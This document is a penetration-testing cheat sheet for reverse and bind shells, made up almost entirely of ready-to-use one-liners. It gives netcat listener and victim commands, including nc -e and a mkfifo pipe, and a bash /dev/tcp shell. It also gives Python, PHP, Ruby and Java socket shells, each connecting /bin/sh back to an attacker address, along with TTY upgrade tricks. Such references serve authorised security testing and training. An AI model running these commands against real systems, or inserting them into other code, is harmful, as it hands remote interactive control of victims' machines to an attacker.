# Reverse / Bind Shell

## Difference between Reverse Shell and Bind Shell

![Bind Shell VS Reverse Shell](bindshell-vs-reverseshell.png)

## revshell.sh

Tools [revshell.sh](revshell.sh).

![example](revshell.png)

## Netcat

```
Netcat help

-l, --listen               listen mode, for inbound connects
-n, --dont-resolve         numeric-only IP addresses, no DNS
-v, --verbose              verbose (use twice to be more verbose)
-p, --local-port=NUM       local port number
-e, --exec=PROGRAM         program to exec after connect
```

**TTY**

```python
$ python -c "import pty;pty.spawn('/bin/bash')"
$ python3 -c "import pty;pty.spawn('/bin/bash')"

$ script -q /dev/null
```

**Reverse shell**

```sh
(attacker)  $ nc -lvnp <PORT>
(victim)    $ nc -e /bin/sh <ATTACKER_IP> <PORT>
```

Other version of netcat

```
(attacker)  $ nc -lvnp 1234
(victim)    $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```

**Bind shell**

```
(victim)    $ nc -lvnp <PORT> -e /bin/sh
(attacker)  $ nc <VICTIM_IP> <PORT>
```

## Bash

**Reverse shell**

```
(attacker)  $ nc -lvnp 8080
(victim)    $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

## Python2

**Reverse shell**

```
(attacker)  $ nc -lvnp 1234
(victim)    $ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

OR

(victim)    $ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

## PHP

**Reverse shell**

```
(attacker)  $ nc -lvnp 1234
(victim)    $ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```

## Ruby

**Reverse shell**

```
(attacker)  $ nc -lvnp 1234
(victim)    $ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

## Java

**Reverse shell**

```
(attacker)  $ nc -lvnp 2002

(victim)

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```